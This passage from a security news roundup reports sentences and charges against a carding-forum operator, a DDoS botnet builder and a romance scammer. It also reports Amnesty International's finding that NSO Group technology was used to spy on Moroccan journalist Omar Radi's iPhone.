Aleksei Burkov, 30, operated both the Cardplanet cybercrime forum and a second, invite-only site where crooks trafficked in stolen bank card information. To get into the VIP site, criminals would have to be able to show evidence of at least $5,000 worth of fraud. The nine-year term may actually be something of a relief for Burkov. He has spent the past five years in various nations’ jail systems, having been cuffed in Israel in 2015 and formally extradited to the US in 2019.

DDoS mastermind gets 13 months

A man behind a massive distributed denial-of-service (DDoS) operation will get his mail via the Alaska Department of Corrections for the next year.

Kenneth Schuchman, of Vancouver, Washington, USA, was jailed for 13 months this week after admitting one count of aiding and abetting computer intrusions. Schuchman was the brains behind the massive Satori DDoS botnet: with his two co-conspirators, known as Drake and Vamp, Schuchman built up the massive network of infected PCs and then rented them out to crooks to flood systems off the internet.

Romance scammer busted

William Asiedu, who preyed on women on online dating sites, admitted a charge of wire fraud conspiracy. It is said Asiedu posed as a lonely heart to trick a woman in Arizona and another in Switzerland into sending him $450,000 in what they thought was cash to support their would-be beau. When he is sentenced in October, Asiedu faces up to 20 years behind bars.

Journo’s phone spied on using NSO tech

Israeli spyware maker NSO Group has been linked to the surveillance of a Moroccan journalist. Amnesty International said an iPhone used by Omar Radi was the target of a “network injection” attack using NSO technology.
